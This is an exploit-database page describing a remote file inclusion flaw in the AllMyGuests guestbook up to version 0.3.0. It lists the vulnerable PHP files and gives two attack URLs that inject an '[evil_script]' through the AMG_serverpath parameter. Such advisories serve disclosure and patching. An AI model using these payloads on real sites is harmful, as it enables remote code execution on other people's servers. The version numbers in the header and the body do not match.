[ authorization ] [ registration ] [ restore account ]
Contact us
You can contact us by:
0day Today Exploits Market and 0day Exploits Database

AllMyGuests <= 0.3.0 (AMG_serverpath) Remote Inclusion Vulnerabilities

Author
beks
Risk
[
Security Risk Unsored
]
0day-ID
0day-ID-1370
Category
web applications
Date add
07-01-2007
Platform
unsorted
======================================================================
AllMyGuests <= 0.3.0 (AMG_serverpath) Remote Inclusion Vulnerabilities
======================================================================



#Software: AllMyGuests

#Version: 3.0

#Found By: beks

#Bug In:

/include/submit.inc.php
/admin/index.php
/include/cm_submit.inc.php
/comments.php
/index.php
/signin.php

#Risk: Medium

http://[target]/[AllMyGuests_Path]/comments.php?AMG_serverpath=[evil_script]
http://[target]/[AllMyGuests_Path]/signin.php?sent=1&AMG_serverpath=[evil_script]



#  0day.today [2024-11-16]  #